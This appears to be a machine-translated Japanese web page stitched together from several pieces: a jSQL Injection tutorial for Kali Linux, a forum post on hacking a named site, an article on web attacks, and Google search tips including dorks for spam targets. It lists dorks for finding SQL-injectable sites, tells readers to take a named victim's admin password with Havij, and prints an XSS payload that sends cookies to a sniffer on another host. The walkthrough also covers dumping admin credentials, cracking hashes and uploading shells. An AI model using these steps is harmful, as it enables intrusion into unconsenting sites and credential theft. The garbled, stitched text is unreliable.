Kali Linux で SQL インジェクションを検索および活用するための多機能ツールである jSQL インジェクションの使用手順。 jSQL インジェクションの使用手順 - Kali Linux で SQL インジェクションを検索および活用するための多機能ツール

13.10.2023
そこで、特別な知識がなくても何かをハッキングする方法を説明します。 これによるメリットはほとんどないとすぐに言いますが、それでもです。
まず、サイト自体を見つける必要があります。 これを行うには、google.com にアクセスして dorks を検索します

inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-質問-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem。 php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view。 php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

ここに小さなリストがあります。 あなたのものを使用できます。 そして、私たちはこのサイトを見つけました。 たとえば、http://www.vestitambov.ru/
次に、このプログラムをダウンロードします

**非表示のコンテンツ: この非表示のコンテンツを表示するには、投稿数が 3 以上である必要があります。**

「OK」をクリックします。 次に、被害サイトを挿入します。
スタートを押します。 次は結果を待ちます。
そして、プログラムは SQL の脆弱性を発見しました。

次に、Havij をダウンロードし、http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= 受け取ったリンクをそこに貼り付けます。 Havij の使用方法とダウンロード場所については説明しません。Havij を見つけるのは難しくありません。 全て。 必要なデータ、つまり管理者パスワードを受け取りました。あとはあなたの想像力次第です。

追伸 これは私が何かを書くのは初めての試みです。 何か間違っていたらごめんなさい

について少し話すことにしました 情報セキュリティ。 この記事は、初心者プログラマやフロントエンド開発に取り組み始めたばかりの人にとって役立ちます。 何が問題ですか?

多くの初心者開発者はコードを書くことに夢中になり、自分たちの作業のセキュリティを完全に忘れてしまいます。 そして最も重要なことは、SQL や XXS クエリなどの脆弱性を忘れていることです。 また、管理パネル用の簡単なパスワードを考え出し、総当たり攻撃を受​​けます。 これらの攻撃は何ですか?どうすれば回避できますか?

SQLインジェクション

SQL インジェクションは、データベースに対する最も一般的なタイプの攻撃であり、特定の DBMS に対する SQL クエリ中に実行されます。 多くの人々、そして大企業さえもこのような攻撃の被害に遭っています。 その理由は、データベース、および厳密に言えば SQL クエリを作成する際の開発者エラーです。

SQL インジェクション攻撃は、SQL クエリで使用される入力データの誤った処理が原因で発生する可能性があります。 ハッカーの攻撃が成功すると、データベースの内容だけでなく、パスワードやログも失われる危険があります。 管理パネル。 そして、このデータは、サイトを完全に乗っ取ったり、取り消し不能な調整を加えたりするのに十分です。

この攻撃は、PHP、ASP、Perl、その他の言語で書かれたスクリプトで正常に再現できます。 このような攻撃が成功するかどうかは、使用される DBMS とスクリプト自体の実装方法に大きく依存します。 世界中には SQL インジェクションの脆弱なサイトが数多くあります。 これは簡単に確認できます。 「dorks」と入力するだけです。これらは脆弱なサイトを検索するための特別なクエリです。 その一部を次に示します。

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:ページID=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

それらの使い方は? Google または Yandex 検索エンジンにそれらを入力するだけです。 検索エンジンでは、脆弱なサイトだけでなく、この脆弱性に関するページも表示されます。 しかし、そこで止まらず、そのページが本当に脆弱であるかどうかを確認します。 これを行うには、値「id=1」の後に一重引用符「‘」を置くだけで十分です。 次のようなもの:

  • inurl:games.php?id=1’

そして、サイトでは次のようなエラーが表示されます。 SQLクエリ。 私たちのハッカーは次に何を必要とするでしょうか?

そして、彼はエラー ページへのまさにこのリンクを必要としています。 その後、ほとんどの場合、この脆弱性への作業は、インジェクション コードの導入と必要な操作の実行という部分のユーティリティを備えた「Kali linux」ディストリビューションで行われます。 これがどうなるかは、私には言えません。 しかし、これに関する情報はインターネットで見つけることができます。

XSS攻撃

この種の攻撃は次の場所で実行されます。 クッキー。 ユーザーもまた、それらを保存することを好みます。 なぜだめですか? 彼らがいなかったらどうするでしょうか? 結局のところ、Cookie のおかげで、Vk.com や Mail.ru のパスワードを 100 回も入力する必要がなくなります。 そしてそれを拒否する人はほとんどいません。 しかし、インターネットでは、ハッカーにとって、利便性の係数は安全性の係数に正比例するという法則がよく現れます。

XSS 攻撃を実装するには、ハッカーには JavaScript の知識が必要です。 一見すると、この言語はコンピューター リソースにアクセスできないため、非常にシンプルで無害です。 ハッカーはブラウザで JavaScript を操作することしかできませんが、それだけで十分です。 結局のところ、重要なことは、Web ページにコードを入力することです。

攻撃プロセスについては詳しく説明しません。 これがどのように起こるかについての基本と意味のみを説明します。

ハッカーは JS コードをフォーラムやゲスト ブックに追加できます。

document.location.href =”http://192.168.1.7/sniff.php?test”

スクリプトは感染したページにリダイレクトし、そこでコードが実行されます。スニファー、ある種のストレージ、または何らかの方法でキャッシュから Cookie を盗むエクスプロイトです。

なぜ JavaScript なのか? JavaScript は Web リクエストの処理に優れており、Cookie にアクセスできるためです。 しかし、スクリプトによって何らかのサイトに誘導されると、ユーザーはすぐにそれに気づくでしょう。 ここでハッカーはより狡猾なオプションを使用します。単に画像にコードを入力するだけです。

Img=新しい画像();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

単純にイメージを作成し、それにスクリプトをアドレスとして割り当てます。

これらすべてから身を守るにはどうすればよいでしょうか? とてもシンプルです。疑わしいリンクをクリックしないでください。

DoS および DDos 攻撃

DoS (英語のサービス妨害から) - サービス拒否) - ハッカー攻撃の上 コンピュータシステム彼女を失敗に導くために。 これは、正規のシステム ユーザーが提供されたシステム リソース (サーバー) にアクセスできない、またはアクセスが困難な状況を作り出すことです。 緊急事態においてソフトウェアがバージョン、部品などの重要な情報を生成する場合、システム障害は乗っ取りへのステップとなる可能性もあります。 プログラムコードしかし、ほとんどの場合、これは経済的圧力の尺度であり、収入を生み出す単純なサービスの喪失です。 プロバイダーからの請求や攻撃を回避するための手段は、懐の「標的」に大きく影響します。現在、DoS 攻撃と DDoS 攻撃が最も一般的であり、法的に重要な証拠を残さずにほぼすべてのシステムを失敗させることができます。

DoS 攻撃と DDos 攻撃の違いは何ですか?

DoS は巧妙な方法で設計された攻撃です。 たとえば、サーバーが受信パケットの正確性をチェックしない場合、ハッカーは処理に永遠にかかるリクエストを作成する可能性があり、他の接続を処理するのに十分なプロセッサ時間がなくなります。 したがって、クライアントはサービスを拒否されます。 ただし、この方法で大規模な有名サイトを過負荷にしたり無効にしたりすることはできません。 彼らは、このような過負荷に問題なく対処できる、かなり幅広いチャネルと超強力なサーバーを備えています。

DDoS は実際には DoS と同じ攻撃です。 ただし、DoS で要求パケットが 1 つあったとしても、DDoS では数百以上の要求パケットが存在する可能性があります。 超強力なサーバーであっても、このような過負荷には対処できない場合があります。 例を挙げてみましょう。

DoS 攻撃とは、誰かと会話しているときに、マナーの悪い人が近づいてきて大声で叫び始めることです。 話すのは不可能か、非常に難しいです。 解決策: 警備員に電話し、警備員がその人を落ち着かせて敷地内から排除します。 このようなマナーの悪い人たちが数千人で押し寄せるのがDDoS攻撃です。 この場合、警備員は全員を縛り上げて連れ去ることはできません。

DoS および DDoS は、コンピュータ、いわゆるゾンビから実行されます。 これらは、自分のマシンがサーバーへの攻撃に参加していることをまったく疑っていないハッカーによってハッキングされたユーザーのコンピューターです。

このことから身を守るにはどうすればよいでしょうか? 一般的には、あり得ません。 しかし、ハッカーにとって事態をさらに困難にすることもできます。 これを行うには、強力なサーバーを備えた優れたホスティングを選択する必要があります。

ブルートフォース攻撃

開発者は、多くの攻撃防御システムを考案したり、作成したスクリプトを完全にレビューしたり、サイトの脆弱性をチェックしたりすることができます。 しかし、Web サイトのレイアウトの最後のステップに到達するとき、つまり管理パネルのパスワードを設定するだけのとき、彼は 1 つのことを忘れる可能性があります。 パスワード!

単純なパスワードを設定することは強くお勧めしません。 これは、12345、1114457、vasya111 などです。10 ~ 11 文字未満のパスワードを設定することはお勧めできません。 そうしないと、最も一般的で単純な攻撃であるブルート フォースの攻撃を受ける可能性があります。

ブルート フォースは、辞書パスワード攻撃です。 特別番組。 辞書はさまざまです。ラテン語、数字による列挙、たとえば特定の範囲までの混合 (ラテン語 + 数字)、さらには固有の文字 @#4$%&*~~`’”\ を含む辞書もあります。 等

もちろん、この種の攻撃は複雑なパスワードを考え出すだけで簡単に回避できます。 キャプチャでも救われます。 また、サイトが CMS で作成されている場合、多くの CMS がこの種の攻撃を検出し、IP をブロックします。 パスワードに異なる文字が多いほど、推測が難しくなるということを常に覚えておく必要があります。

ハッカーはどのように働くのでしょうか? ほとんどの場合、パスワードの一部を疑うか、事前に知っています。 ユーザーのパスワードが 3 文字や 5 文字で構成されていないと考えるのは非常に論理的です。 このようなパスワードは頻繁なハッキングにつながります。 基本的に、ハッカーは 5 ~ 10 文字の範囲を取得し、事前に知っている可能性のあるいくつかの文字を追加します。 次に、必要な範囲のパスワードが生成されます。 で カリ分布 Linux にはそのような場合に対応するプログラムもあります。 そして、辞書の量がそれほど大きくなくなったため、攻撃は長くは続かなくなります。 さらに、ハッカーはビデオ カードの能力を利用する可能性があります。 一部はCUDA方式に対応しており、検索速度が10倍も向上します。 そして今、攻撃は次のようになっていることがわかります 簡単な方法でかなりリアルです。 しかし、総当たり攻撃の対象となるのは Web サイトだけではありません。

開発者の皆様、情報セキュリティ システムのことを決して忘れないでください。今日、国家を含む多くの人々がこの種の攻撃に苦しんでいるからです。 結局のところ、最大の脆弱性は、常にどこかに気が散ったり、何かを見逃したりする可能性がある人です。 私たちはプログラマーですが、プログラムされた機械ではありません。 情報を失うと重大な結果が生じる可能性があるため、常に警戒してください。

google.com を使用して正しく検索する方法

おそらく誰もがこれの使い方を知っています 検索エンジン、Google のような =) しかし、正しく構成すれば誰もがそれを知っているわけではありません 検索クエリ特別なデザインの助けを借りて、探している結果をより効率的かつ迅速に得ることができます =) この記事では、正しく検索するために何をどのように行う必要があるかを説明します。

Google は、google.com で検索するときに特別な意味を持ついくつかの高度な検索演算子をサポートしています。 通常、これらの演算子は検索を変更するか、Google に検索を完全に実行するように指示することもあります。 さまざまな種類検索。 たとえば、 link: コンストラクトは特殊な演算子であり、リクエストは リンク:www.google.com通常の検索は行われませんが、代わりに google.com へのリンクがあるすべての Web ページが検索されます。
代替リクエストタイプ

キャッシュ: クエリに他の単語を含めると、Google はキャッシュされたドキュメント内で含まれている単語を強調表示します。
例えば、 キャッシュ:www.Web サイト「Web」という単語が強調表示されたキャッシュされたコンテンツが表示されます。

link: 上記の検索クエリは、指定されたクエリへのリンクを含む Web ページを表示します。
例えば: リンク:www.site http://www.site へのリンクがあるすべてのページが表示されます

関連: 指定された Web ページに「関連する」Web ページを表示します。
例えば、 関連: www.google.com類似した Web ページをリストします ホームページグーグル。

info: 情報のリクエスト: リクエストしている Web ページに関して Google が保有している情報の一部が表示されます。
例えば、 情報:ウェブサイトフォーラムに関する情報が表示されます =) (Armada - アダルト ウェブマスター フォーラム)。

その他の情報リクエスト

定義: 定義: クエリは、その後に入力した単語の定義を、さまざまなオンライン ソースから収集して提供します。 定義は入力された語句全体に対するものになります (つまり、正確なクエリ内のすべての単語が含まれます)。

株: 株でクエリを開始した場合: Google は残りのクエリ用語を株記号として処理し、これらの記号に関する既製の情報を表示するページにリンクします。
例えば、 株:インテル・ヤフー Intel と Yahoo に関する情報が表示されます。 (会社名ではなく、ニュース速報の記号を入力する必要があることに注意してください)

クエリ修飾子

site: クエリに site: を含めると、Google はそのドメイン内で見つかった Web サイトに結果を限定します。
ru、org、com などの個別のゾーンで検索することもできます ( サイト:com サイト:ru)

allintitle: allintitle: を使用してクエリを実行すると、Google は結果をタイトル内のすべてのクエリ単語に制限します。
例えば、 アリンタイトル: グーグル検索 画像、ブログなどの検索によりすべての Google ページが返されます。

intitle: クエリに intitle: を含めると、Google はタイトルにその単語を含むドキュメントに結果を限定します。
例えば、 タイトル:ビジネス

allinurl: allinurl: を使用してクエリを実行すると、Google は結果を URL 内のすべてのクエリ単語に制限します。
例えば、 allinurl: Google 検索 Google でドキュメントを返し、タイトルで検索します。 また、オプションとして、単語をスラッシュ (/) で区切ると、同じページ内でスラッシュの両側にある単語が検索されます。 allinurl: foo/bar

inurl: クエリに inurl: を含めると、Google は URL にその単語を含むドキュメントに結果を限定します。
例えば、 アニメーションinurl:site

intext: タイトルやリンク テキスト、その他の関連しないものを無視して、ページ テキスト内の指定された単語のみを検索します。この修飾子から派生したもの、allintext: も存在します。 さらに、クエリ内のすべての単語はテキスト内でのみ検索されますが、これも重要な場合があり、リンク内で頻繁に使用される単語は無視されます。
例えば、 本文:フォーラム

daterange: 時間枠内で検索します (daterange:2452389-2452389)。時間の日付はユリウス形式です。

そうですね、あらゆる種類の興味深いクエリの例があります

Google へのクエリの作成例。 スパマー向け

Inurl:control.guest?a=sign

サイト:books.dreambook.com 「ホームページ URL」 「Sign my」 inurl:sign

サイト:www.freegb.net ホームページ

Inurl:sign.asp 「文字数」

「メッセージ:」 inurl:sign.cfm 「送信者:」

Inurl:register.php 「ユーザー登録」「Webサイト」

Inurl:edu/guestbook 「ゲストブックに署名」

Inurl:post 「コメントを投稿」「URL」

URL:/archives/ 「コメント:」 「情報を覚えていますか?」

「スクリプトとゲストブックの作成者:」 「URL:」 「コメント:」

Inurl:?action=add “phpBook” “URL”

タイトル:「新しいストーリーを投稿する」

雑誌

URL:www.livejournal.com/users/mode=reply

Inurlgreatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? 「 ゲストブック

ブログ

Inurl:blogger.com/comment.g?”投稿ID””匿名”

Inurl:typepad.com/ 「コメントを投稿する」 「個人情報を覚えていますか?」

Inurl:greatestjournal.com/community/ 「コメントの投稿」 「匿名投稿者のアドレス」

「投稿コメント」「匿名投稿者のアドレス」 -

タイトル:「コメントを投稿する」

Inurl:pirillo.com 「コメントを投稿」

フォーラム

Inurl:gate.html?”name=フォーラム” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:「mes.php?」

Inurl:”members.html”

「URL:forum/memberlist.php?」

ダウンロードしたファイルをダブルクリックして実行します ( 仮想マシン ).

3. サイトの SQL インジェクションをチェックする際の匿名性
Kali Linux での Tor と Privoxy のセットアップ

【開発中のセクション】

Windows での Tor と Privoxy のセットアップ

【開発中のセクション】

jSQLインジェクションのプロキシ設定

【開発中のセクション】

4. jSQL InjectionでSQLインジェクションが発生しているサイトを確認する

プログラムの操作は非常に簡単です。 Web サイトのアドレスを入力して Enter キーを押すだけです。

次のスクリーンショットは、サイトが一度に 3 種類の SQL インジェクションに対して脆弱であることを示しています (それらに関する情報は右下隅に示されています)。 インジェクションの名前をクリックすると、使用する方法を切り替えることができます。

また、既存のデータベースもすでに表示されています。

各テーブルの内容を表示できます。

通常、テーブルに関して最も興味深いのは管理者の資格情報です。

運よく管理者のデータを見つけたとしても、喜ぶのはまだ早いです。 このデータを入力する管理パネルを見つける必要があります。

5. jSQL インジェクションを使用して管理パネルを検索する

これを行うには、次のタブに移動します。 ここでは、可能なアドレスのリストが表示されます。 1 つまたは複数のページを選択して確認できます。

利便性は、他のプログラムを使用する必要がないという事実にあります。

残念ながら、パスワードを平文で保存する不注意なプログラマはそれほど多くありません。 パスワード行には、次のようなものがよく見られます。

8743b52063cd84097a65d1633f5c74f5

これはハッシュです。 ブルートフォースを使用して復号化できます。 そして... jSQL インジェクションにはブルート フォーサーが組み込まれています。

6. jSQL インジェクションを使用したブルート フォース ハッシュ

間違いなく便利なのは、他のプログラムを探す必要がないことです。 最も一般的なハッシュの多くがサポートされています。

これが一番ではない 最良の選択肢。 ハッシュ解読の第一人者になるには、ロシア語の本「」をお勧めします。

しかし、もちろん、手元に他のプログラムがない場合や、勉強する時間がない場合には、ブルート フォース機能が組み込まれた jSQL インジェクションが非常に便利です。

設定があります。パスワードにどの文字を含めるか、パスワードの長さの範囲を設定できます。

7. SQLインジェクション検出後のファイル操作

データベースの読み取りと変更といったデータベースの操作に加えて、SQL インジェクションが検出された場合は、次のファイル操作を実行できます。

  • サーバー上のファイルを読み取る
  • 新しいファイルをサーバーにアップロードする
  • シェルをサーバーにアップロードする

これらはすべて jSQL インジェクションで実装されています。

制限があります。SQL サーバーにはファイル権限が必要です。 賢明な人たち システム管理者彼らは無効になっており、アクセスできます ファイルシステム手に入らないでしょう。

ファイル権限の存在は非常に簡単に確認できます。 いずれかのタブ (ファイルの読み取り、シェルの作成、新しいファイルのアップロード) に移動し、指定された操作のいずれかを実行してみます。

もう 1 つの非常に重要な注意事項 - 作業するファイルへの正確な絶対パスを知る必要があります。そうでないと何も機能しません。

次のスクリーンショットを見てください。

ファイルを操作しようとすると、「FILE 特権がありません (ファイル特権がありません)」と返されます。 そして、ここでは何もできません。

別のエラーが発生した場合は、次のようにします。

[ディレクトリ名] への書き込み中に問題が発生しました

これは、ファイルを書き込む絶対パスを誤って指定したことを意味します。

絶対パスを推測するには、少なくとも次の知識が必要です。 オペレーティング·システムサーバーが実行されている場所。 これを行うには、「ネットワーク」タブに切り替えます。

このエントリ (Win64 行) は、Windows OS を扱っていると仮定する理由を示しています。

キープアライブ: タイムアウト = 5、最大 = 99 サーバー: Apache/2.4.17 (Win64) PHP/7.0.0RC6 接続: キープアライブ メソッド: HTTP/1.1 200 OK コンテンツの長さ: 353 日付: 金曜日、2015 年 12 月 11 日11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; 文字セット=UTF-8

ここにはいくつかの Unix (*BSD、Linux) があります。

Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X-搭載: PHP/5.3.29 サーバー: Apache/2.2.31 (Unix)

そしてここにCentOSがあります:

メソッド: HTTP/1.1 200 OK 有効期限: 木、1981 年 11 月 19 日 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ 接続: キープアライブ X-キャッシュ ルックアップ: t1.hoster.ru:6666 からのミス サーバー: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-キャッシュ: からのミスt1.hoster.ru キャッシュ制御: no-store、no-cache、must-revalidate、post-check=0、pre-check=0 プラグマ: no-cache 日付: Fri, 11 Dec 2015 12:08:54 GMT転送エンコーディング: チャンク化されたコンテンツ タイプ: text/html; charset=WINDOWS-1251

Windows では、サイトの一般的なフォルダーは C:\Server\data\htdocs\ です。 しかし実際には、誰かが Windows 上にサーバーを構築することを「考えた」場合、その人は特権について何も聞いたことがない可能性が高くなります。 したがって、C:/Windows/ ディレクトリから直接試してみる必要があります。

ご覧のとおり、最初はすべてがうまくいきました。

しかし、jSQL インジェクション シェル自体には私の心の中に疑問が生じます。 ファイル権限がある場合は、Web インターフェイスを使用して簡単にアップロードできます。

8. SQL インジェクションのサイトの一括チェック

そして、この機能も jSQL インジェクションで利用できます。 すべては非常に簡単です。サイトのリストをダウンロードし (ファイルからインポート可能)、確認したいサイトを選択し、適切なボタンをクリックして操作を開始します。

jSQL インジェクションからの結論

jSQLインジェクションは良いですが、 強力なツール Web サイトで見つかった SQL インジェクションを検索して使用するため。 疑いのない利点: 使いやすさ、組み込みの関連機能。 jSQL インジェクションは、Web サイトを分析する際の初心者の強い味方になります。

欠点の中でも、データベースの編集が不可能であることに注意してください (by 少なくともこの機能は見つかりませんでした)。 すべての GUI ツールと同様に、このプログラムの欠点の 1 つは、スクリプトで使用できないことに起因すると考えられます。 それにもかかわらず、一括サイトチェックの組み込み機能のおかげで、このプログラムではある程度の自動化も可能です。

jSQL インジェクション プログラムは、sqlmap よりもはるかに使いやすいです。 ただし、sqlmap はより多くの種類の SQL インジェクションをサポートし、ファイル ファイアウォールやその他の機能を操作するためのオプションを備えています。

結論: jSQL インジェクションは初心者ハッカーの親友です。

Kali Linux Encyclopedia のこのプログラムのヘルプは、次のページにあります: http://kali.tools/?p=706